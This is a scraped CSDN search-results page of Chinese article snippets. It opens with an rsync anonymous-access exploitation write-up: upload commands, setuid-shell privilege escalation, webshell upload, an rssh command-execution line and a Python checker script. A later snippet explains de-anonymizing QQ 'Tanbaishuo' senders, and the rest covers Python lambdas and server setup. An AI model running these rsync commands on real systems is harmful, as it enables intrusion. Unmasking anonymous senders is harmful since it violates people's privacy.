精华内容
下载资源
问答
  • 漏洞利用——Rsync匿名访问漏洞

    千次阅读 2020-01-31 15:08:53
    Rsync匿名访问漏洞 Rsync简介 什么是Rsync Rsync(remote synchronize)是一个远程数据同步工具, 可通过LAN/WAN快速同步多台主机间的文件。 什么是Rsync的匿名访问 匿名访问很简单,不需要用户名,不需要身份...

    在这里插入图片描述


    QQ 1285575001
    Wechat M010527
    技术交流 QQ群599020441
    纪年科技aming


    Rsync匿名访问漏洞

    Rsync简介
    什么是Rsync
    Rsync(remote synchronize)是一个远程数据同步工具,
    可通过LAN/WAN快速同步多台主机间的文件。

    什么是Rsync的匿名访问
    匿名访问很简单,不需要用户名,不需要身份验证的所有信息
    (包括各种口令、公私钥、生物学特征等等),
    简而言之就是一句话,没有任何访问控制,直接可以访问

    在这里插入图片描述
    在这里插入图片描述

    一般危害

    下载:#rsync -avz a.b.c.d::path/file path/filiname
    上传:#rsync -avz path/filename a.b.c.d::path/file

    提权操作

    #chmod a+s shell
    #rsync -avz shell a.b.c.d::path/file
    查看shell权限不变,运行后提权到root,也可以尝试上传webshell

    rssh

    此外rssh-2.3.3-3没有正确过滤-e选项,可能导致问题。

    #rsync -e./script.sh a.b.c.d::/tmp--server ./

    漏洞验证

    Metaspolit的auxiliary/scanner/rsync/modules_list
    python脚本

     # -*- coding:utf-8 -*-
    """
        Rsync匿名访问漏洞(未授权访问漏洞)验证工具
    """
    
    #引入依赖的包和库文件
    import os
    import sys
    import socket
    import logging
    
    #全局配置设置
    logging.basicConfig(level=logging.INFO,format="%(message)s")
    socket.setdefaulttimeout(3)
    
    
    #全局变量
    client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    
    
    #全局函数:
    def str2Binary(content):
        """将文本流转换成二进制流"""
        return content.replace(' ','').replace('\n','').decode('hex')
    
    def rsyncCheck(ip,port):
        """执行端口预检查"""
        global client
        try:
            client.connect((ip,port))
        except Exception,reason:
            logging.error("[-] 访问失败:%s"%reason)
            return False
        helloString = "405253594e43443a2033312e300a"
        try:
            client.send(str2Binary(helloString))
            hellodata = client.recv(1024)
        except Exception,reason:
            logging.error("[-] 通信失败:%s"%reason)
            return False
        if hellodata.find("@RSYNCD") >= 0:
            try:
                client.send(str2Binary("0a"))
            except Exception,reason:
                logging.error("[-] 访问失败:%s"%reason)
                return False
            while True:
                try:
                    data = client.recv(1024)
                except Exception,reason:
                    logging.error("[-] 通信失败:%s"%reason)
                if data == "":
                    break
                else:
                    if str(data).find("@RSYNCD: EXIT") >= 0:
                        logging.info("[*] 发现漏洞!")
                        return True
        return False
    
    
    if __name__ == "__main__":
        ip = sys.argv[1]
        try:
            port = sys.argv[2]
        except Exception,reason:
            port = 873
            logging.error("[-] 端口未输入,按照873默认端口进行")
        try:
            port = int(port)
        except Exception,reason:
            logging.error("[-] 端口输入错误,按照873默认端口进行")
            port = 873
        if not rsyncCheck(ip,port):
            logging.info("[+] 测试安全!")
    
    展开全文
  • 定义一个函数与变量的定义非常相似,对于有名函数,必须通过变量名访问 def func(x,y,z=1): return x+y+z print(func(1,2,3)) 匿名函数定义:使用 lambda 来创建匿名函数 匿名函数1. 没有名字 2:函数体自带...

    Python3 匿名函数

    定义一个函数与变量的定义非常相似,对于有名函数,必须通过变量名访问

    def func(x,y,z=1):
        return x+y+z
    
    print(func(1,2,3))
    

    匿名函数定义:使用 lambda 来创建匿名函数

    匿名函数1. 没有名字 2:函数体自带return

    匿名函数

    '''
    遇到问题没人解答?小编创建了一个Python学习交流QQ群:857662006 
    寻找有志同道合的小伙伴,互帮互助,群里还有不错的视频学习教程和PDF电子书!
    '''
    def func(x,y,z=1):
    
    return x+y+z
    print(lambda x,y,z=1:x+y+z)
    
    function <lambda> at 0x0000000003469488>
    匿名函数也是一个函数对象,匿名函数赋值给一个变量,再利用变量来调用该函数
    f=lambda x,y,z=1:x+y+z
    print(f)
    print(f(1,2,3))
    

    匿名函数的应用场景:应用于一次性的场景,临时使用

    2、匿名函数结合使用内置函数的用法

    max,min,sorted,map,reduce,filter的用法

    字典的运算:最小值,最大值,排序

    '''
    遇到问题没人解答?小编创建了一个Python学习交流QQ群:857662006 
    寻找有志同道合的小伙伴,互帮互助,群里还有不错的视频学习教程和PDF电子书!
    '''
    salaries={
    'egon':3000,
    'alex':100000000,
    'wupeiqi':10000,
    'yuanhao':2000
    }
    
    print(max(salaries))  #  默认比较key值大小
    print(max(salaries.values()))  # 比较values值
    print(max(salaries,key=lambda name:salaries[name]))  取values,来比较
    print(min(salaries,key=lambda name:salaries[name])) 取values,来比较
    print(max(zip(salaries.values(),salaries.keys()))[1])  # 通过zip的方式实现
    
    
    
    
    def get_value(name):
        return salaries[name]
    print(max(salaries,key=get_value))
    
    '''
    遇到问题没人解答?小编创建了一个Python学习交流QQ群:857662006 
    寻找有志同道合的小伙伴,互帮互助,群里还有不错的视频学习教程和PDF电子书!
    '''
    names=['alex','wupeiqi','yuanhao','yanglei','egon']
    res=map(lambda x:x if x == 'egon' else x+'二狗子',names)
    print(res)
    print(list(res))
    
    names=['alex','wupeiqi','yuanhao','yanglei','egon']
    
    def my_map(func,seq):
    
        for item in seq:
    
            yield func(item)
    
    res1=my_map(lambda x:x+'_二狗',names)
    
    print(next(res1))
    
    print(next(res1))
    
    functools中导入reduce模块
    
    from functools import reduce
    print(reduce(lambda x,y:x+y,range(101),100))
    print(reduce(lambda x,y:x+y,range(101)))
    
    names=['alex_二狗','wupeiqi_二狗','yuanhao_二狗','yanglei_二狗','egon']
    
    print(list(filter(lambda name:name.endswith('二狗'),names)))
    
    展开全文
  • 其他关于Python的总结文章请访问:https://blog.csdn.net/qq_38962621/category_10299380.html Python 中的 lambda 与匿名函数 Python中使用 lambda 创建一个匿名函数,匿名函数不需要使用 def 来定义函数了,是另一...

    其他关于Python的总结文章请访问:https://blog.csdn.net/qq_38962621/category_10299380.html

    Python 中的 lambda 与匿名函数

    Python中使用 lambda 创建一个匿名函数,匿名函数不需要使用 def 来定义函数了,是另一种比较简单的方式,但是由于只能书写一行,所以所能支持的逻辑较少,而且不能访问自己参数列表之外的或全局名称空间中的其他参数,同时也不同于C++中的内联函数,内联函数的目的是调用小函数时不占用栈内存从而增加运行效率,而python中使用 lambda 只是一种较为简单的表达方式:

    表达式的语法:

    funcName = lambda parameters : expression
    

    比如:

    mySum = lambda a,b : a+b
    
    print(mySum(10,20))
    
    ------
    
    30
    
    展开全文
  • Hide IP Easy采用的是高度匿名代理,它不会改变你的request fields,使服务器端看来就像有个真正的客户浏览器在访问它。当然,你的真实IP是隐藏起来的,服务器的网管不会认为你使用了代理. 谁也不知道你用了代理 ....
  • QQ坦白说好友分析

    千次阅读 2018-04-15 11:27:38
    最近QQ推出了坦白说栏目,允许给一个人匿名发送一个印象,然后别人回复了你的话,你们两个就可以聊天了,并且他不知道你,你却知道他,和QQ空间秘密不一样的是,秘密是双方都是匿名的,并且只能通过留言的方式来聊天...

    最近QQ推出了坦白说栏目,允许给一个人匿名发送一个印象,然后别人回复了你的话,你们两个就可以聊天了,并且他不知道你,你却知道他,和QQ空间秘密不一样的是,秘密是双方都是匿名的,并且只能通过留言的方式来聊天,而坦白说是一方匿名,可以即时聊天。

    收到的消息如图所示


    通过抓包,我们可以抓到这个是一个网址

    https://ti.qq.com/honest-say/my-received.html

    直接访问这个地址,会直接跳到手机QQ下载页面,因为没有cookie和UA

    带上QQ空间的cookies,和手机的UA访问


    可以看到这个网页列表了,在浏览器调试里面找到这段网址

    https://ti.qq.com/cgi-node/honest-say/receive/mine?_client_version=0.0.7&_t=1523761349720&token=1592905018

    这是一段json数据,里面有很多段坦白说数据,这个正式我们需要找的数据,可以看到里面有一段

    fromEncodeUin:“*S1*7K4zNKnqoecl”

    那么这个就是重头,好友的QQ


    不过这个东西是一段不知道什么样的数据,如何解密呢?

    我们可以让指定的好友给我们发送坦白说,通过对比后发现,这个是有规律的。前面的*S1*, 是固定的,每个QQ都会有这个数据,那么剩下的就好办了,多几个QQ就对比出来了。

    使用java 哈希表来做这个最好了。


    那么最终获取就告一段落了。

    那我们直接访问这个https://ti.qq.com/cgi-node/honest-say/receive/mine?_client_version=0.0.7&_t=1523761349720&token=1592905018

    不就能获取了吗,仔细研究一下知道了,里面有两个参数,一个是t,一般来说t都是代表time,应该是时间戳,通过寻找js代码查看


    看得到,t的确是时间戳,token,是通过获取cookies里面的skey数据来计算的,其实看到这儿我就已经知道了,很明显,这个就是gtk数据了,使用下面的java数据即可计算

    两个都有了,就可以直接提交了获取数据了。但是,直接获取不会返回数据,而会返回一段json~~

    带上cookies访问即可获取数据了。

    后续

    我做成了一个安卓版本的成品,大家可以访问github下载

    https://github.com/ghboke/tanbaishuo

    展开全文
  • 因为种种原因,一些朋友只能通过代理服务器来访问互联网。由于腾讯QQ服务器在深圳(属于电信),因此...为了找到代理服务器,我们必须选择匿名访问,也就是说,登录到代理服务器时不需要用户名和密码。在搜索引擎中可.
  • 2、本人不愿安装qq,以ftp方式进行传输,先在windows系统机器上架设ftp服务器,指定其文件目录及访问方式和权限,我这里为了省事,设置为匿名访问,读写权限。 3、在mac系统上,可以通过自带的ftp工具访问windows的...
  • 洋葱网络简单介绍

    千次阅读 2017-10-31 10:38:00
    通过洋葱网络来进行匿名访问网站 https://mp.weixin.qq.com/s?__biz=MzIzMzgxOTQ5NA==&mid=2247483855&idx=1&sn=4c028f0b8df5d5a729e0234197f5f4b3&chksm=e...
  • Linux发邮件

    2020-06-17 11:41:50
    1.需要vsftpd服务器,配置文件中要允许匿名访问,开启21号端口。 2.需要下载yum install -y mailx 下载完还需要开启,再关闭postfix服务,会和mailx冲突 3.配置vim /etc/mail.rc 在末尾添加下面的内容 set from=359*...
  • 在网络上,用户访问有两种状态,匿名(没登录) 实名(登录) 比如 : 1 上百度搜索 ,匿名用户获取的权限,已基本满足用户的使用需要; 2 上淘宝,匿名只有浏览器的使用权,想要买东西 ,必须登入(获取权限) 3 上...
  • 如果在不设置任何的情况下,可以以匿名的方式访问该ftp。 注.如果访问不了的时候请大家要把linux的防火墙也要关闭: iptables -F 清除防火墙 一、需要的组件 图片服务器两个服务: Nginx(图片访问): 1、...
  • Java四种内部类

    2016-08-26 10:32:18
    参考:http://blog.csdn.net/qq435757399/article/details/7037007四种内部类:常规内部类、静态内部类、局部内部类、匿名内部类1、常规内部类 常规内部类没有用static修饰且定义在外部类类体中,常规内部类可以...
  • 2021-06-08

    2021-06-08 09:21:28
    其中,80%的事实度量表是匿名访问者,仅包含少数详细信息。20%的是可靠的注册用户,且这些注册用户有较为详细的信息,与多个维度表中的数据相连。 2,例如一个金融产品维度表,且这些金融产品有银行类的,保险类等等...
  • 方舟wap手机建站系统

    2010-03-06 18:14:33
    2.打开c:\windows目录(总之进入系统目录里面),右键点击temp文件属性,在[安全]标签里面添加上interniet来宾用户(IUSER_电脑名,即网站匿名访问用户名)并且将允许写入勾上√。此操作是允许网站数据库的正常运行! ...
  • 蜘蛛日志文章评论网站评论自助链接匿名提交站点,添加友链访问网站自动审核通过 VIP会员等级VIP付费升级单个文章或者站点付费快审多背景图片可自定义背景图片 多色彩皮肤多种颜色皮肤自有切换URL路由美化可以自定义...
  • 自助链接匿名提交站点,添加友链访问网站自动审核通过 VIP会员等级 VIP付费升级 单个文章或者站点付费快审 多背景图片可自定义背景图片 多色彩皮肤多种颜色皮肤自有切换 URL路由美化可以自定义url样式,让url更加...
  • 蜘蛛日志 文章评论 网站评论 自助链接匿名提交站点,添加友链访问网站自动审核通过 会员等级 VIP 付费升级 单个文章或者站点付费快审 多背景图片可自定义背景图片 多色彩皮肤多种颜色皮肤自有切换 URL路由美化可以...
  • 自助链接匿名提交站点,添加友链访问网站自动审核通过 VIP 会员等级 VIP 付费升级 单个文章或者站点付费快审 多背景图片可自定义背景图片 多色彩皮肤多种颜色皮肤自有切换 URL路由美化可以自定义url样式,让...
  • 蜘蛛日志文章评论网站评论自助链接匿名提交站点,添加友链访问网站自动审核通过 会员等级VIP付费升级单个文章或者站点付费快审多背景图片可自定义背景图片 多色彩皮肤多种颜色皮肤自有切换URL路由美化可以自定义url...
  • Zhong__Python lambda()

    2020-12-11 17:09:13
    作者:Zhong QQ交流群:121160124 欢迎加入 Python内置函数lambda() python 使用 lambda 来创建匿名函数。 lambda只是一个表达式,函数体比def简单很多。 lambda的主体是一个表达式,而不是一个代码块。仅仅...
  • 蜘蛛日志 文章评论 网站评论 自助链接匿名提交站点,添加友链访问网站自动审核通过 VIP 会员等级 VIP 付费升级 单个文章或者站点付费快审 多背景图片可自定义背景图片 多色彩皮肤多种颜色皮肤自有切换 URL路由美化...
  • 内部类小结

    2018-06-06 10:25:21
    内部类方法可以访问该类定义所在的作用域中的数据,包括私有的数据。 内部类可以对同一包中的其他类隐藏起来。 当想要定义一个回调函数且不想编写大量代码时,使用匿名内部类比较快捷。 内部类所实现得到...
  • 蜘蛛日志 文章评论 网站评论 自助链接匿名提交站点,添加友链访问网站自动审核通过 会员等级 VIP 付费升级 单个文章或者站点付费快审 多背景图片可自定义背景图片 多色彩皮肤多种颜色皮肤自有切换 URL路由美化可以...
  • 自助链接匿名提交站点,添加友链访问网站自动审核通过 VIP 会员等级 VIP 付费升级 单个文章或者站点付费快审 多背景图片可自定义背景图片 多色彩皮肤多种颜色皮肤自有切换 URL路由美化可以自定义url样式,让url更加...
  • 自助链接匿名提交站点,添加友链访问网站自动审核通过 VIP 会员等级 VIP 付费升级 单个文章或者站点付费快审 多背景图片可自定义背景图片 多色彩皮肤多种颜色皮肤自有切换 URL路由美化可以自定义url样式,让url更加...
  • 已知bug,QQ打开自动短信,短信会乱码。 (如果想匿名拨号??像挪车码哪样?短信可以对接短信平台,创建个触发条件,。电话,,呃呃呼叫转移?) 下一步打算加入后台,用户可自定义编辑号码,内容,生成...
  • 蜘蛛日志 文章评论 网站评论 自助链接匿名提交站点,添加友链访问网站自动审核通过 会员等级 VIP 付费升级 单个文章或者站点付费快审 多背景图片可自定义背景图片 多色彩皮肤多种颜色皮肤自有切换 URL路由美化可以...
  • 刷人气小工具

    千次阅读 2011-03-16 13:06:00
    假期无聊时写的,专门写来刷网易博客与QQ空间人气的小工具,很好玩,才几天我的网易博客访问量从几千刷到二十多万了,怪不好意思的,有图有真相。  把工具功能稍微完善一下,希望能刷各大网站的博客。由于各大...
  • 蜘蛛日志 文章评论 网站评论 自助链接匿名提交站点,添加友链访问网站自动审核通过 会员等级 VIP 付费升级 单个文章或者站点付费快审 多背景图片可自定义背景图片 多色彩皮肤多种颜色皮肤自有切换 URL路由美化可以...

空空如也

空空如也

1 2 3 4 5
收藏数 93
精华内容 37
关键字:

qq匿名访问